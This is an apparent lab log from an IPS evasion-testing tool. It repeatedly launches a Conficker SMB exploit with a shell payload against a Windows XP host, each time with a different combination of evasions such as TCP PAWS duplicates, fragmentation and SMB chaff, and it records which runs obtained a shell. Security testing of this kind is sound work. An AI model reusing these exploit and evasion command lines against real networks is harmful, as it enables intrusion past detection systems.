  1108. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63136 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=HrVWX3wtaqA --evasion=[smb_connect,smb_opentree]smb_chaff,"2","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","170135684","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"3","random" --verifydelay=1000 --payload=shell
  1109. Info: Using random seed HrVWX3wtaqA
  1110. The following evasions are applied from stage smb_connect to smb_opentree:
  1111. - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  1112. The following evasions are applied from stage smb_opentree to msrpc_req:
  1113. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 170135684> and has random bytes as payload
  1114. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1115. - Add a random urgent data byte to every 3 TCP segment.
  1116.  
  1117. Info: NetBIOS connection 10.62.90.110:63136 -> 10.35.1.207:445
  1118. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1119. Info: Sending MSRPC request with exploit
  1120. Info: Shell found, attack succeeded
  1121. Info: Shell closed
  1122. 0: Success.
  1123. .
  1124. 28123 runs averaging 1.76 runs / second ; progress: 15941/43200......
  1125. 28129 runs averaging 1.76 runs / second ; progress: 15946/43200.Pid 6900 timed out - killed
  1126. 2015-11-29 18:51:38 INFO
  1127. Timed out (10.62.90.118):
  1128. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51735 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=yAsyNYuc8v4 --evasion=[msrpc_bind,msrpc_req]smb_chaff,"2","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","562","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  1129. Info: Using random seed yAsyNYuc8v7
  1130. The following evasions are applied from stage smb_connect to end:
  1131. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  1132. The following evasions are applied from stage smb_opentree to msrpc_req:
  1133. - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 562 random alphanumeric bytes.
  1134. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1135. - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  1136.  
  1137. Info: NetBIOS connection 10.62.90.118:51735 -> 10.35.1.207:445
  1138. Terminated
  1139. ......
  1140. 28137 runs averaging 1.76 runs / second ; progress: 15951/43200Pid 6977 timed out - killed
  1141. 2015-11-29 18:51:44 INFO
  1142. Timed out (10.62.90.114):
  1143. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47476 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=isRm9W2VVvw --evasion=[start,netbios_connect]tcp_paws,"1","2","alpharandomized" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  1144. Info: Using random seed isRm9W2VVvy
  1145. The following evasions are applied from stage start to netbios_connect:
  1146. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
  1147. The following evasions are applied from stage smb_openpipe to end:
  1148. - 75% probability to add a random urgent data byte to a TCP segment.
  1149.  
  1150. Info: NetBIOS connection 10.62.90.114:47476 -> 10.35.1.207:445
  1151. Terminated
  1152. ....
  1153. 28142 runs averaging 1.76 runs / second ; progress: 15956/43200
  1154. 28142 runs averaging 1.76 runs / second ; progress: 15961/43200Pid 7270 timed out - killed
  1155. 2015-11-29 18:51:53 INFO
  1156. Timed out (10.62.90.119):
  1157. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58090 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Hgg7DheMpXo --evasion=[smb_opentree,msrpc_req]tcp_chaff,"2","chksum|nullchksum|nullflag","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_chaff,"3","chksum|nullchksum|nullflag|outofwindow|shorthdr","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  1158. Info: Using random seed Hgg7DheMpXo
  1159. The following evasions are applied from stage smb_opentree to msrpc_req:
  1160. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1161. * Invalid TCP checksum.
  1162. * NULL TCP checksum.
  1163. * NULL TCP control flags.
  1164. * Duplicate packet has original payload with alphanumeric bytes randomized
  1165. The following evasions are applied from stage smb_openpipe to end:
  1166. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1167. * Invalid TCP checksum.
  1168. * NULL TCP checksum.
  1169. * NULL TCP control flags.
  1170. * An out-of-window sequence number.
  1171. * TCP header shorter than 20 bytes
  1172. * Duplicate packet has random alphanumeric bytes as payload
  1173. - 50% probability to add a zero urgent data byte to a TCP segment.
  1174.  
  1175. Info: NetBIOS connection 10.62.90.119:58090 -> 10.35.1.207:445
  1176. Terminated
  1177. Pid 7300 timed out - killed
  1178. 2015-11-29 18:51:54 INFO
  1179. Timed out (10.62.90.116):
  1180. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13639 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=QiqTvuFtUiA --evasion=[smb_opentree,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  1181. Info: Using random seed QiqTvuFtUiB
  1182. The following evasions are applied from stage smb_opentree to end:
  1183. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1184. The duplicate packet has identical payload except that alphabetic characters are randomized
  1185. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1186. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  1187.  
  1188. Info: NetBIOS connection 10.62.90.116:13639 -> 10.35.1.207:445
  1189. Terminated
  1190. ......
  1191. 28150 runs averaging 1.76 runs / second ; progress: 15966/43200.......
  1192. 28157 runs averaging 1.76 runs / second ; progress: 15971/43200.......
  1193. 28164 runs averaging 1.76 runs / second ; progress: 15976/43200..........
  1194. 28174 runs averaging 1.76 runs / second ; progress: 15981/43200..............
  1195. 28188 runs averaging 1.76 runs / second ; progress: 15986/43200............2015-11-29 18:52:22 INFO
  1196. Success. (10.62.90.116):
  1197. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43646 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=SZGGJgzT8+g --evasion=[start,smb_connect]tcp_paws,"8","1","shuffle30" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435455","random" --verifydelay=1000 --payload=shell
  1198. Info: Using random seed SZGGJgzT8+h
  1199. The following evasions are applied from stage start to smb_connect:
  1200. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has 30 bytes of original payload, then shuffled original payload
  1201. The following evasions are applied from stage netbios_connect to msrpc_req:
  1202. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
  1203.  
  1204. Info: NetBIOS connection 10.62.90.116:43646 -> 10.35.1.207:445
  1205. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1206. Info: Sending MSRPC request with exploit
  1207. Info: Shell found, attack succeeded
  1208. Info: CommandShell::SendCommand() - Failed to send string
  1209. Info: Command shell connection reset.
  1210. Info: Shell closed
  1211. 0: Success.
  1212. .
  1213. 28202 runs averaging 1.76 runs / second ; progress: 15991/43200...............
  1214. 28217 runs averaging 1.76 runs / second ; progress: 15996/43200.2015-11-29 18:52:27 INFO
  1215. Success. (10.62.90.116):
  1216. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65461 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Msb/Ot5EHnw --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","6","alpharandomized" --evasion=[smb_opentree,msrpc_bind]tcp_seg,"1" --verifydelay=1000 --payload=shell
  1217. Info: Using random seed Msb/Ot5EHnw
  1218. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
  1219. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1220. - TCP packets are segmented to contain at most 1 bytes of payload.
  1221. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1222. - IPv4 fragments with at most 24 bytes per fragment
  1223.  
  1224. Info: NetBIOS connection 10.62.90.116:65461 -> 10.35.1.207:445
  1225. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1226. Info: Sending MSRPC request with exploit
  1227. Info: Shell found, attack succeeded
  1228. Info: Shell closed
  1229. 0: Success.
  1230. ............
  1231. 28231 runs averaging 1.76 runs / second ; progress: 16001/43200..2015-11-29 18:52:34 INFO
  1232. Success. (10.62.90.116):
  1233. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38050 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=xGZ1/aGMnEk --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1448" --evasion=[netbios_connect,msrpc_req]netbios_chaff,"50%","msrpc_req" --evasion=[netbios_connect,end]tcp_paws,"75%","4","shuffle" --verifydelay=1000 --payload=shell
  1234. Info: Using random seed xGZ1/aGMnEn
  1235. The following evasions are applied from stage netbios_connect to end:
  1236. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
  1237. The following evasions are applied from stage netbios_connect to msrpc_req:
  1238. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  1239. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1240. - IPv4 fragments with at most 1448 bytes per fragment
  1241.  
  1242. Info: NetBIOS connection 10.62.90.116:38050 -> 10.35.1.207:445
  1243. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1244. Info: Sending MSRPC request with exploit
  1245. Info: Shell found, attack succeeded
  1246. Info: Shell closed
  1247. 0: Success.
  1248. ..
  1249. 28236 runs averaging 1.76 runs / second ; progress: 16006/43200...
  1250. 28239 runs averaging 1.76 runs / second ; progress: 16011/43200..........
  1251. 28249 runs averaging 1.76 runs / second ; progress: 16016/43200.........
  1252. 28258 runs averaging 1.76 runs / second ; progress: 16021/43200................
  1253. 28274 runs averaging 1.76 runs / second ; progress: 16026/43200................
  1254. 28290 runs averaging 1.76 runs / second ; progress: 16031/43200........
  1255. 28298 runs averaging 1.76 runs / second ; progress: 16036/43200....Pid 9020 timed out - killed
  1256. 2015-11-29 18:53:10 INFO
  1257. Timed out (10.62.90.111):
  1258. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33477 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=CHrh0o4+Eik --evasion=[start,smb_openpipe]tcp_paws,"75%","10","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  1259. Info: Using random seed CHrh0o4+Eik
  1260. The following evasions are applied from stage start to smb_openpipe:
  1261. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
  1262. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1263. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  1264.  
  1265. Info: NetBIOS connection 10.62.90.111:33477 -> 10.35.1.207:445
  1266. Terminated
  1267. .....
  1268. 28308 runs averaging 1.76 runs / second ; progress: 16041/43200.........
  1269. 28317 runs averaging 1.76 runs / second ; progress: 16046/43200.........
  1270. 28326 runs averaging 1.76 runs / second ; progress: 16052/43200..........
  1271. 28336 runs averaging 1.76 runs / second ; progress: 16057/43200......
  1272. 28342 runs averaging 1.76 runs / second ; progress: 16062/43200.....
  1273. 28347 runs averaging 1.76 runs / second ; progress: 16067/43200.........
  1274. 28356 runs averaging 1.76 runs / second ; progress: 16072/43200...2015-11-29 18:53:44 INFO
  1275. Success. (10.62.90.116):
  1276. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63149 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Jl4yonimAlo --evasion=[smb_connect,msrpc_req]smb_decoytrees,"2","1","2","random_msrpcreq" --evasion=[start,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
  1277. Info: Using random seed Jl4yonimAlo
  1278. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  1279. The following evasions are applied from stage smb_connect to msrpc_req:
  1280. - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  1281.  
  1282. Info: NetBIOS connection 10.62.90.116:63149 -> 10.35.1.207:445
  1283. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1284. Info: Sending MSRPC request with exploit
  1285. Info: Shell found, attack succeeded
  1286. Info: Shell closed
  1287. 0: Success.
  1288. ........
  1289. 28368 runs averaging 1.76 runs / second ; progress: 16077/432002015-11-29 18:53:47 INFO
  1290. Success. (10.62.90.116):
  1291. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43826 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PC0BS/oNbts --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","8","alpharandomized" --evasion=[msrpc_bind,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1292. Info: Using random seed PC0BS/oNbts
  1293. The following evasions are applied from stage netbios_connect to msrpc_req:
  1294. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
  1295. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1296. - TCP timestamps echo reply value is sent in the wrong endianness
  1297.  
  1298. Info: NetBIOS connection 10.62.90.116:43826 -> 10.35.1.207:445
  1299. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1300. Info: Sending MSRPC request with exploit
  1301. Info: Shell found, attack succeeded
  1302. Info: Command shell connection reset.
  1303. Info: CommandShell::SendCommand() - Failed to send string
  1304. Info: Shell closed
  1305. 0: Success.
  1306. ...........
  1307. 28380 runs averaging 1.76 runs / second ; progress: 16082/43200..........
  1308. 28390 runs averaging 1.76 runs / second ; progress: 16087/43200............
  1309. 28402 runs averaging 1.77 runs / second ; progress: 16092/43200.......Pid 10253 timed out - killed
  1310. 2015-11-29 18:54:05 INFO
  1311. Timed out (10.62.90.113):
  1312. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15281 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=oEsZ7fgDE68 --evasion=[start,smb_openpipe]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  1313. Info: Using random seed oEsZ7fgDE6+
  1314. The following evasions are applied from stage start to smb_openpipe:
  1315. - IPv4 fragments with at most 1472 bytes per fragment
  1316. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1317. - 50% probability to add a zero urgent data byte to a TCP segment.
  1318.  
  1319. Info: NetBIOS connection 10.62.90.113:15281 -> 10.35.1.207:445
  1320. Terminated
  1321. .......
  1322. 28417 runs averaging 1.77 runs / second ; progress: 16097/43200....
  1323. 28421 runs averaging 1.77 runs / second ; progress: 16102/43200......
  1324. 28427 runs averaging 1.76 runs / second ; progress: 16107/43200....
  1325. 28431 runs averaging 1.76 runs / second ; progress: 16112/43200....
  1326. 28435 runs averaging 1.76 runs / second ; progress: 16117/43200.
  1327. 28436 runs averaging 1.76 runs / second ; progress: 16122/43200.....
  1328. 28441 runs averaging 1.76 runs / second ; progress: 16127/43200.......
  1329. 28448 runs averaging 1.76 runs / second ; progress: 16132/43200.....
  1330. 28453 runs averaging 1.76 runs / second ; progress: 16137/43200......
  1331. 28459 runs averaging 1.76 runs / second ; progress: 16142/43200......
  1332. 28465 runs averaging 1.76 runs / second ; progress: 16147/43200.............
  1333. 28478 runs averaging 1.76 runs / second ; progress: 16152/43200..........
  1334. 28488 runs averaging 1.76 runs / second ; progress: 16157/43200..........Pid 11292 timed out - killed
  1335. 2015-11-29 18:55:12 INFO
  1336. Timed out (10.62.90.117):
  1337. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37589 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/44Lb9fhL+E --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"7","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  1338. Info: Using random seed /44Lb9fhL+H
  1339. The following evasions are applied from stage smb_connect to smb_opentree:
  1340. - 7 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  1341. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1342. - Add a random alphaurgent data byte to every 2 TCP segment.
  1343.  
  1344. Info: NetBIOS connection 10.62.90.117:37589 -> 10.35.1.207:445
  1345. Terminated
  1346.  
  1347. 28499 runs averaging 1.76 runs / second ; progress: 16162/43200.....Pid 11315 timed out - killed
  1348. 2015-11-29 18:55:14 INFO
  1349. Timed out (10.62.90.112):
  1350. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23858 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=TUOmd39n/3I --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"13","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  1351. Info: Using random seed TUOmd39n/3J
  1352. The following evasions are applied from stage smb_opentree to end:
  1353. - Add a random urgent data byte to every 2 TCP segment.
  1354. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1355. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1356.  
  1357. Info: NetBIOS connection 10.62.90.112:23858 -> 10.35.1.207:445
  1358. Terminated
  1359. ........2015-11-29 18:55:17 INFO
  1360. Success. (10.62.90.114):
  1361. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34627 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Fyro1IIugKo --evasion=[smb_openpipe,msrpc_bind]ipv4_opt,"2","inc","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
  1362. Info: Using random seed Fyro1IIugKo
  1363. The following evasions are applied from stage smb_opentree to msrpc_req:
  1364. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
  1365. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1366. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1367. The duplicate packet has random alphabetic bytes as payload
  1368.  
  1369. Info: NetBIOS connection 10.62.90.114:34627 -> 10.35.1.207:445
  1370. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1371. Info: Sending MSRPC request with exploit
  1372. Info: Shell found, attack succeeded
  1373. Info: Shell closed
  1374. 0: Success.
  1375. ...
  1376. 28517 runs averaging 1.76 runs / second ; progress: 16167/43200................
  1377. 28533 runs averaging 1.76 runs / second ; progress: 16172/43200........
  1378. 28541 runs averaging 1.76 runs / second ; progress: 16177/43200...
  1379. 28544 runs averaging 1.76 runs / second ; progress: 16182/43200...........
  1380. 28555 runs averaging 1.76 runs / second ; progress: 16187/43200...................
  1381. 28574 runs averaging 1.76 runs / second ; progress: 16192/43200.............
  1382. 28587 runs averaging 1.76 runs / second ; progress: 16197/43200....
  1383. 28591 runs averaging 1.76 runs / second ; progress: 16202/43200...........
  1384. 28602 runs averaging 1.76 runs / second ; progress: 16207/43200......
  1385. 28608 runs averaging 1.76 runs / second ; progress: 16212/43200.......Pid 11803 timed out - killed
  1386. 2015-11-29 18:56:06 INFO
  1387. Timed out (10.62.90.115):
  1388. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22964 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=LeqaqL5XwYM --evasion=[smb_connect,msrpc_req]tcp_segvar,"1","65535" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  1389. Info: Using random seed LeqaqL5XwYM
  1390. The following evasions are applied from stage smb_connect to msrpc_req:
  1391. - TCP packets are segmented to contain between 1 and 65535 bytes of payload.
  1392. The following evasions are applied from stage smb_openpipe to end:
  1393. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  1394.  
  1395. Info: NetBIOS connection 10.62.90.115:22964 -> 10.35.1.207:445
  1396. Terminated
  1397. ......
  1398. 28622 runs averaging 1.76 runs / second ; progress: 16217/43200.2015-11-29 18:56:09 INFO
  1399. Success. (10.62.90.115):
  1400. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60975 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=ilnMy/qVBQY --evasion=[smb_opentree,end]smb_decoytrees,"5","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"1245","new","random_alpha" --verifydelay=1000 --payload=shell
  1401. Info: Using random seed ilnMy/qVBQa
  1402. The following evasions are applied from stage smb_opentree to end:
  1403. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  1404. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1405. - TCP segments are set to overlap by 1245 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  1406.  
  1407. Info: NetBIOS connection 10.62.90.115:60975 -> 10.35.1.207:445
  1408. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1409. Info: Sending MSRPC request with exploit
  1410. Info: Shell found, attack succeeded
  1411. Info: Command shell connection reset.
  1412. Info: CommandShell::SendCommand() - Failed to send string
  1413. Info: Shell closed
  1414. 0: Success.
  1415. ...........
  1416. 28635 runs averaging 1.77 runs / second ; progress: 16222/43200..2015-11-29 18:56:14 INFO
  1417. Success. (10.62.90.115):
  1418. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31595 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=bktDO+ILREo --evasion=[netbios_connect,end]ipv4_frag,"40" --evasion=[smb_connect,end]smb_decoytrees,"3","1","3","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","4","1","random_alphanum" --verifydelay=1000 --payload=shell
  1419. Info: Using random seed bktDO+ILREp
  1420. The following evasions are applied from stage netbios_connect to end:
  1421. - IPv4 fragments with at most 40 bytes per fragment
  1422. The following evasions are applied from stage smb_connect to end:
  1423. - Before normal SMB writes, 3 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  1424. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1425. - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random alphanumeric bytes.
  1426.  
  1427. Info: NetBIOS connection 10.62.90.115:31595 -> 10.35.1.207:445
  1428. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1429. Info: Sending MSRPC request with exploit
  1430. Info: Shell found, attack succeeded
  1431. Info: Shell closed
  1432. 0: Success.
  1433. ...........Interrupt registered, soft shutdown